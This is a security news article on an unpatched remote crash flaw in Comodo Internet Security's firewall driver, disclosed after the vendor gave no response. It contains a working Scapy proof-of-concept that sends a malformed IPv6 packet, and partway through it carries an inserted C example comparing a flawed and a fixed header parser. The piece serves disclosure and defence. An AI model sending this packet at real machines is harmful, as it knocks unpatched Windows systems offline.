Critical Comodo Internet Security 0-Day Crash Vulnerability Lets
An unpatched zero-day vulnerability in Comodo Internet Security’s firewall driver, Inspect.sys, has been publicly disclosed after researchers received no response from the vendor following multiple disclosure attempts. This critical flaw, which remains unaddressed, reportedly allows attackers to achieve significant system compromise, posing a serious risk to users.
The vulnerability, dubbed ComoDoS and uncovered by Marcus Hutchins, allows a remote attacker to crash a target Windows system with a single malformed IPv6 packet, bypassing all configured firewall rules in the process.
At the time of publication, no patch exists. Marcus Hutchins submitted a full root-cause analysis, patch suggestions, and a proof-of-concept (PoC) to Comodo’s security team but received zero acknowledgment.
Comodo Internet Security 0-Day Vulnerability
The flaw resides in Inspect.sys’s IPv6 header parser. IPv6 packets support optional “extension headers” that chain between the fixed 40-byte IPv6 header and the upper-layer protocol (TCP, UDP, etc.).
The parser iterates through these extension headers, subtracting each header’s length from a payload_length variable derived directly from the attacker-controlled IPv6 fixed header.
The critical issue: the code never validates the payload length field. If an attacker sets the IPv6 payload length to a value smaller than the total extension header lengths, the unsigned 64-bit payload_length variable underflows and wraps around to approximately 18.4 quintillion (0xFFFFFFFFFFFFFFF8).
Because the firewall driver must parse TCP/IP headers before enforcing any firewall rules, this parsing occurs regardless of whether every port is blocked.
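The extension-header walk described above, as an added illustration that is not Comodo's Inspect.sys code: a simplified parser that takes payload_length straight from the fixed header and subtracts each header's length without a check, beside a checked version that rejects the chain before the subtraction can wrap. The packet is constructed inline (a 16-byte Destination Options header chaining to a TCP SYN, laid out per RFC 8200); the function names and the sample are assumptions for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added example, not the driver's code. Layout per RFC 8200; sample packet
 * is constructed: 40-byte fixed header + 16-byte Destination Options + 20-byte TCP. */
#define IPV6_FIXED_LEN 40
#define NH_HOP_BY_HOP  0
#define NH_TCP         6
#define NH_ROUTING     43
#define NH_DEST_OPTS   60
#define SAMPLE_LEN     76

/* Extension headers whose second byte is "Hdr Ext Len" in 8-octet units,
 * not counting the first 8 octets. */
static int is_chained_ext(uint8_t nh)
{
    return nh == NH_HOP_BY_HOP || nh == NH_DEST_OPTS || nh == NH_ROUTING;
}

/* Build the constructed sample with a caller-chosen Payload Length field.
 * Addresses stay zero; only the length fields matter for the walk. */
size_t build_sample(uint8_t *buf, uint16_t plen)
{
    memset(buf, 0, SAMPLE_LEN);
    buf[0] = 0x60;                                  /* version 6 */
    buf[4] = (uint8_t)(plen >> 8);                  /* Payload Length (from the wire) */
    buf[5] = (uint8_t)(plen & 0xff);
    buf[6] = NH_DEST_OPTS; buf[7] = 64;             /* Next Header 60, Hop Limit */
    buf[40] = NH_TCP; buf[41] = 1;                  /* DestOpts -> TCP, (1+1)*8 = 16 bytes */
    buf[42] = 1; buf[43] = 12;                      /* PadN option, 12 zero bytes */
    buf[56] = 0x05; buf[57] = 0x39; buf[59] = 0x50; /* TCP 1337 -> 80 */
    buf[67] = 1; buf[68] = 0x50; buf[69] = 0x02;    /* ack 1, data offset 5, SYN */
    buf[70] = 0x20;                                 /* window 0x2000 */
    return SAMPLE_LEN;
}

/* Unchecked walk mirroring the flaw: payload_length is decremented per header
 * with no comparison first, so a Payload Length smaller than the chain wraps
 * the unsigned 64-bit value. Returns whatever remains. */
uint64_t walk_unchecked(const uint8_t *pkt, size_t len, uint8_t *final_nh)
{
    uint64_t payload_length = (uint16_t)((pkt[4] << 8) | pkt[5]);
    uint8_t nh = pkt[6];
    size_t off = IPV6_FIXED_LEN;
    while (is_chained_ext(nh) && off + 2 <= len) {
        uint64_t hdr_len = ((uint64_t)pkt[off + 1] + 1) * 8;
        payload_length -= hdr_len;      /* no check: 8 - 16 wraps to 0x...FFF8 */
        nh = pkt[off];
        off += hdr_len;
    }
    *final_nh = nh;
    return payload_length;
}

/* Checked walk: the declared payload must fit in the bytes received and every
 * header must fit in the payload that is still left. Returns 0 on success
 * (final_nh/remaining filled in) or -1 for a malformed chain. */
int walk_checked(const uint8_t *pkt, size_t len, uint8_t *final_nh,
                 uint64_t *remaining)
{
    if (len < IPV6_FIXED_LEN)
        return -1;
    uint64_t payload_length = (uint16_t)((pkt[4] << 8) | pkt[5]);
    if (payload_length + IPV6_FIXED_LEN > len)
        return -1;                      /* claims more payload than was received */
    uint8_t nh = pkt[6];
    size_t off = IPV6_FIXED_LEN;
    /* Invariant: off + payload_length == 40 + plen <= len, so reads stay in bounds. */
    while (is_chained_ext(nh)) {
        if (payload_length < 8)
            return -1;                  /* smallest extension header is 8 octets */
        uint64_t hdr_len = ((uint64_t)pkt[off + 1] + 1) * 8;
        if (hdr_len > payload_length)
            return -1;                  /* subtraction would underflow: reject */
        payload_length -= hdr_len;
        nh = pkt[off];
        off += hdr_len;
    }
    *final_nh = nh;
    *remaining = payload_length;
    return 0;
}

/* Run each walk over the sample with the given Payload Length field. */
uint64_t demo_unchecked(uint16_t plen)
{
    uint8_t buf[SAMPLE_LEN], nh;
    return walk_unchecked(buf, build_sample(buf, plen), &nh);
}
int demo_checked(uint16_t plen)
{
    uint8_t buf[SAMPLE_LEN], nh;
    uint64_t rem = 0;
    return walk_checked(buf, build_sample(buf, plen), &nh, &rem);
}
uint64_t demo_checked_remaining(uint16_t plen)
{
    uint8_t buf[SAMPLE_LEN], nh;
    uint64_t rem = 0;
    return walk_checked(buf, build_sample(buf, plen), &nh, &rem) == 0 ? rem : 0;
}
```

With the Payload Length set to 8 (smaller than the 16-byte extension header, as in the article's packet) the unchecked walk ends with 0xFFFFFFFFFFFFFFF8, the value the article quotes, while the checked walk returns -1 before touching anything past the header; with a consistent Payload Length of 36 both walks agree that 20 bytes of TCP remain. The two conditions in the checked walk (declared length against bytes received, header length against remaining payload) are the same checks a network-level filter would apply to drop malformed extension-header chains before they reach the host.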
The resulting integer underflow triggers a kernel crash (BSOD), making it a reliable remote denial-of-service primitive. The PoC exploit is remarkably compact, fitting in four lines of Python using Scapy:
from scapy.all import IPv6, IPv6ExtHdrDestOpt, PadN, TCP, send

# dst_ip is supplied by the caller; it is not defined in the original snippet
ext = IPv6ExtHdrDestOpt(nh=6, options=[PadN(optdata=b"\x00" * 8)])
tcp = TCP(sport=1337, dport=80, flags="S", seq=0, ack=1, window=0x2000)
ipv6 = IPv6(dst=dst_ip, nh=60, hlim=64, plen=8)
pkt = ipv6 / ext / tcp
send(pkt)
Marcus Hutchins deliberately used the Destination Options extension header (type 60) because it is subject to the least router-level filtering, maximizing the likelihood that the malicious packet reaches its target across the internet.
Beyond the DoS primitive, Marcus Hutchins identified reachable out-of-bounds (OOB) read and write paths triggered by the same underflowed value. However, both primitives face significant exploitation constraints.
The OOB-read occurs inside a WebDAV/HTTP artifact scanner, where the size value is truncated to 16 bits, capping it at 65 KB. A page fault in this path crashes the system at DISPATCH_LEVEL.
The OOB-write, reached only after a full TCP handshake, truncates the underflowed size to 32 bits, producing a 4 GB kernel pool overflow that is virtually guaranteed to crash the system. Since standard network packets max out at 65 KB, there is no realistic way to shrink the overflow enough to prevent a crash, making remote code execution (RCE) highly unlikely at this time.
The vulnerability was discovered during research into BYOVD (Bring Your Own Vulnerable Driver) attack surfaces using an AI-assisted analysis pipeline.
While auditing Comodo’s older driver version, Marcus Hutchins identified architectural weaknesses that motivated manual analysis of the current driver, leading directly to this finding.
A full PoC is publicly available on GitHub. Organizations relying on Comodo Internet Security should monitor for anomalous IPv6 traffic and consider network-level controls blocking malformed IPv6 extension headers as a temporary mitigation until an official patch is released.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.